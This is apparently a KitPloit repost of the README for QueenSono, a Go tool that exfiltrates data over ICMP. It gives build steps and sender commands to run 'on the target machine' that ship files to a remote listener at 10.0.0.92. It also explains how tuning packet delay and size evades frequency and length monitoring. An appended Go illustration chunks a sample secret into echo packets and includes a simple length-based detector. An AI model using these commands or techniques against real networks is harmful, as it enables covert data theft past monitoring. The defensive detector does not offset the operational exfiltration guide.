QueenSono - Golang Binary For Data Exfiltration With ICMP Protocol

<p><a href="https://1.bp.blogspot.com/-p5_2_IEv9P8/YUuqKRcI1rI/AAAAAAAAvSg/hsnZHGNuRTEP9G-_v8lbWCSQYvVXbj3XQCNcBGAsYHQ/s1350/QueenSono_2_qssono-trunc.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="571" data-original-width="1350" height="270" src="https://1.bp.blogspot.com/-p5_2_IEv9P8/YUuqKRcI1rI/AAAAAAAAvSg/hsnZHGNuRTEP9G-_v8lbWCSQYvVXbj3XQCNcBGAsYHQ/w640-h270/QueenSono_2_qssono-trunc.gif" width="640" /></a></p>
<p style="text-align: left;">QueenSono relies only on the fact that ICMP traffic is usually not monitored, which is quite common. It can also be used against a network with basic ICMP inspection (i.e. a watcher on packet frequency and content length), since the sending delay and the payload size per packet are tunable. It tries to imitate <a href="https://github.com/ytisf/PyExfil" rel="nofollow" target="_blank" title="PyExfil">PyExfil</a> (and others), with the idea that the target machine does not necessarily have Python installed, so providing a standalone binary is useful.</p>
<span style="font-size: x-large;"><b>Install</b></span><br />
<p><em>&gt; Install the binary from source</em></p>
<p>Clone the repo and download the dependencies locally:</p>
<pre><code>git clone https://github.com/ariary/QueenSono.git
make before.build
</code></pre>
<p>To build the ICMP packet sender <code>qssender</code>:</p>
<pre><code>make build.queensono-sender
</code></pre>
<p>To build the ICMP packet receiver <code>qsreceiver</code>:</p>
<pre><code>make build.queensono-receiver
</code></pre>
<br /><span style="font-size: x-large;"><b>Usage</b></span><br />
<p><code>qssender</code> is the binary that sends ICMP packets to the listener, so it is the binary you have to transfer to the target machine.</p>
<p><code>qsreceiver</code> is the listener on your local machine (or wherever you can receive ICMP packets).</p>
<p>All commands and flags of both binaries can be listed with <code>--help</code>.</p>
<br /><span style="font-size: large;"><b>Example 1: Send with "ACK"</b></span><br />
<p><em>&gt; In this example we want to send a big file and watch for echo replies to acknowledge the reception of the packets (ACK).</em></p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-mDD0xXmoAd0/YUup-c0l0aI/AAAAAAAAvSc/KwlmdWaRXWYLWELL21Bz-rh-UIUYPSsuwCNcBGAsYHQ/s1350/QueenSono_1_qssono.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="571" data-original-width="1350" height="270" src="https://1.bp.blogspot.com/-mDD0xXmoAd0/YUup-c0l0aI/AAAAAAAAvSc/KwlmdWaRXWYLWELL21Bz-rh-UIUYPSsuwCNcBGAsYHQ/w640-h270/QueenSono_1_qssono.gif" width="640" /></a></div>
<p>On the local machine:</p>
<pre><code>$ qsreceiver receive -l 0.0.0.0 -p -f received_bible.txt
</code></pre>
<details>
<summary><b>Explanation</b></summary>
<ul>
<li><code>-l 0.0.0.0</code> listen on all interfaces for ICMP packets</li>
<li><code>-f received_bible.txt</code> save the received data to a file</li>
<li><code>-p</code> show a progress bar of the received data</li>
</ul>
</details>
<p>On the target machine:</p>
<pre><code>$ wget https://raw.githubusercontent.com/mxw/grmr/master/src/finaltests/bible.txt #download a huge file (for the example)
$ qssender send file -d 2 -l 127.0.0.1 -r 10.0.0.92 -s 50000 bible.txt
</code></pre>
<details>
<summary><b>Explanation</b></summary>
<ul>
<li><code>send file</code> send a file (<code>bible.txt</code> is the file in question)</li>
<li><code>-d 2</code> send one packet every 2 seconds</li>
<li><code>-l 127.0.0.1</code> the listening address for the <i>echo reply</i></li>
<li><code>-r 10.0.0.92</code> the address of the remote machine where <code>qsreceiver</code> is listening</li>
<li><code>-s 50000</code> the amount of data to send in each packet</li>
</ul>
</details>
<br /><span style="font-size: large;"><b>Example 2: Send without "ACK"</b></span><br />
<p><em>&gt; In this example we want to send a message without waiting for echo replies (useful when the target firewall filters incoming ICMP packets, so the replies would never arrive).</em></p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-p5_2_IEv9P8/YUuqKRcI1rI/AAAAAAAAvSg/hsnZHGNuRTEP9G-_v8lbWCSQYvVXbj3XQCNcBGAsYHQ/s1350/QueenSono_2_qssono-trunc.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="571" data-original-width="1350" height="270" src="https://1.bp.blogspot.com/-p5_2_IEv9P8/YUuqKRcI1rI/AAAAAAAAvSg/hsnZHGNuRTEP9G-_v8lbWCSQYvVXbj3XQCNcBGAsYHQ/w640-h270/QueenSono_2_qssono-trunc.gif" width="640" /></a></div>
<p>On the local machine:</p>
<pre><code>$ qsreceiver receive truncated 1 -l 0.0.0.0
</code></pre>
<details>
<summary><b>Explanation</b></summary>
<ul>
<li><code>receive truncated 1</code> does not wait indefinitely if not all packets are received (<code>1</code> is the delay used with <code>qssender</code>)</li>
</ul>
</details>
<p>On the target machine:</p>
<pre><code>$ qssender send "thisisatest i want to send a string w/o waiting for the echo reply" -d 1 -l 127.0.0.1 -r 10.0.0.190 go.mod -s 1 -N
</code></pre>
<details>
<summary><b>Explanation</b></summary>
<ul>
<li><code>-N</code> no-reply option (don't wait for the <i>echo reply</i>)</li>
</ul>
</details>
<br /><span style="font-size: large;"><b>Notes</b></span><br />
<ul>
<li>only works on Linux (due to the use of the Go ICMP networking package)</li>
<li>needs the <code>CAP_NET_RAW</code> capability (raw sockets)</li>
</ul>
<br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/ariary/QueenSono" rel="nofollow" target="_blank" title="Download QueenSono">Download QueenSono</a></span></b></div>
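<p>To make concrete what the two examples above do on the wire (chunking a file into ICMP echo requests, and what a receiver faces when it cannot rely on echo replies and has to accept a truncated transfer), here is an added illustration that is not QueenSono's own code and uses only the Go standard library. It hand-rolls the echo request header from RFC 792 (type, code, checksum, identifier, sequence number) instead of using Go's ICMP package, never opens a raw socket (so it runs without <code>CAP_NET_RAW</code>), and treats the transfer identifier <code>0x5150</code>, the 56-byte "stock ping" threshold and the sample payload as assumptions chosen for the example. The <code>oversizedEcho</code> check at the end is the minimal form of the "content length watcher" the introduction mentions.</p>

```go
package main

import (
	"encoding/binary"
	"fmt"
)

// ICMP echo request header (RFC 792): type(1) code(1) checksum(2) id(2) seq(2).
const (
	icmpEchoRequest    = 8
	icmpHeaderLen      = 8
	typicalPingPayload = 56 // assumption: a stock ping carries 56 payload bytes
)

// checksum is the RFC 1071 one's-complement sum; over a valid message
// (checksum field included) it yields 0.
func checksum(b []byte) uint16 {
	var sum uint32
	for i := 0; i+1 < len(b); i += 2 {
		sum += uint32(b[i])<<8 | uint32(b[i+1])
	}
	if len(b)%2 == 1 {
		sum += uint32(b[len(b)-1]) << 8
	}
	for sum>>16 != 0 {
		sum = (sum & 0xffff) + (sum >> 16)
	}
	return ^uint16(sum)
}

// buildEcho wraps one chunk in an echo request: id ties a transfer together,
// seq orders its chunks.
func buildEcho(id, seq uint16, payload []byte) []byte {
	pkt := make([]byte, icmpHeaderLen+len(payload))
	pkt[0], pkt[1] = icmpEchoRequest, 0
	binary.BigEndian.PutUint16(pkt[4:], id)
	binary.BigEndian.PutUint16(pkt[6:], seq)
	copy(pkt[icmpHeaderLen:], payload)
	binary.BigEndian.PutUint16(pkt[2:], checksum(pkt))
	return pkt
}

// parseEcho validates an echo request and returns its fields; a receiver must
// reject short packets, other ICMP types and bad checksums.
func parseEcho(pkt []byte) (id, seq uint16, payload []byte, err error) {
	switch {
	case len(pkt) < icmpHeaderLen:
		return 0, 0, nil, fmt.Errorf("packet too short: %d bytes", len(pkt))
	case pkt[0] != icmpEchoRequest || pkt[1] != 0:
		return 0, 0, nil, fmt.Errorf("not an echo request: type %d code %d", pkt[0], pkt[1])
	case checksum(pkt) != 0:
		return 0, 0, nil, fmt.Errorf("bad checksum")
	}
	return binary.BigEndian.Uint16(pkt[4:]), binary.BigEndian.Uint16(pkt[6:]), pkt[icmpHeaderLen:], nil
}

// encodeTransfer splits data into payloads of at most size bytes (the -s knob)
// and emits one echo request per chunk, numbered from 0.
func encodeTransfer(id uint16, data []byte, size int) [][]byte {
	var pkts [][]byte
	for seq, off := 0, 0; off < len(data); seq, off = seq+1, off+size {
		end := off + size
		if end > len(data) {
			end = len(data)
		}
		pkts = append(pkts, buildEcho(id, uint16(seq), data[off:end]))
	}
	return pkts
}

// reassemble orders one transfer's chunks by seq and reports the seqs below the
// highest seen that never arrived. Without echo replies (the -N case) nothing is
// retransmitted, so a receiver must give up after a timeout and account for gaps.
func reassemble(id uint16, pkts [][]byte) (data []byte, missing []uint16) {
	chunks, maxSeq := map[uint16][]byte{}, -1
	for _, p := range pkts {
		pid, seq, payload, err := parseEcho(p)
		if err != nil || pid != id {
			continue // corrupted, or an unrelated ping sharing the wire
		}
		chunks[seq] = payload
		if int(seq) > maxSeq {
			maxSeq = int(seq)
		}
	}
	for s := 0; s <= maxSeq; s++ {
		if c, ok := chunks[uint16(s)]; ok {
			data = append(data, c...)
		} else {
			missing = append(missing, uint16(s))
		}
	}
	return data, missing
}

// oversizedEcho is the simplest "content length watcher" a defender can run:
// flag echo payloads larger than a stock ping would carry.
func oversizedEcho(pkt []byte) bool { return len(pkt)-icmpHeaderLen > typicalPingPayload }

func main() {
	secret := []byte("constructed sample: api_key=EXAMPLE-NOT-REAL-0001\n") // constructed input
	pkts := encodeTransfer(0x5150, secret, 16)
	delivered := append([][]byte{pkts[0]}, pkts[2:]...) // simulate an egress filter dropping seq 1
	data, missing := reassemble(0x5150, delivered)
	fmt.Printf("%d chunks sent, %d bytes reassembled, missing seq %v\n", len(pkts), len(data), missing)
	fmt.Println("1024-byte payload trips the length watcher:", oversizedEcho(buildEcho(0x5150, 0, make([]byte, 1024))))
}
```

<p>On a real sender the byte slices returned by <code>encodeTransfer</code> would be written to a raw ICMP socket, which is the step that needs <code>CAP_NET_RAW</code> on Linux; the receiver would read echo requests from the same kind of socket and feed them to <code>reassemble</code>. The example also shows why the two tunables matter from the defender's side: a small <code>-s</code> keeps each payload under the length a watcher would flag, and <code>-d</code> spreads the packets out against a frequency watcher.</p>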

kitploit
#golang#Pentest#Pentest Tool#Python#QueenSono#Remote
